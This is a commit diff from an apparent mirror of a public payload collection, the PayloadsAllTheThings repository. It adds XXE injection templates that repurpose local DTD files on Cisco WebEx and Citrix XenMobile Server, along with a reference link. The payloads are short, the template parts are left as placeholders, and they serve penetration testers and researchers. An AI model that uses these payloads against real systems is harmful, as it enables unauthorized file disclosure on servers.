mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
commit
a766679356
1 changed files with 14 additions and 1 deletions
|
@ -388,7 +388,18 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
||||||
]>
|
]>
|
||||||
<root></root>
|
<root></root>
|
||||||
```
|
```
|
||||||
|
### Cisco WebEx
|
||||||
|
```
|
||||||
|
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
|
||||||
|
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
|
||||||
|
%local_dtd;
|
||||||
|
```
|
||||||
|
### Citrix XenMobile Server
|
||||||
|
```
|
||||||
|
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
|
||||||
|
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
|
||||||
|
%local_dtd;
|
||||||
|
```
|
||||||
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
|
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
|
||||||
|
|
||||||
|
|
||||||
|
@ -638,3 +649,5 @@ UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules.
|
||||||
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
||||||
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
||||||
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
|
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
|
||||||
|
* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue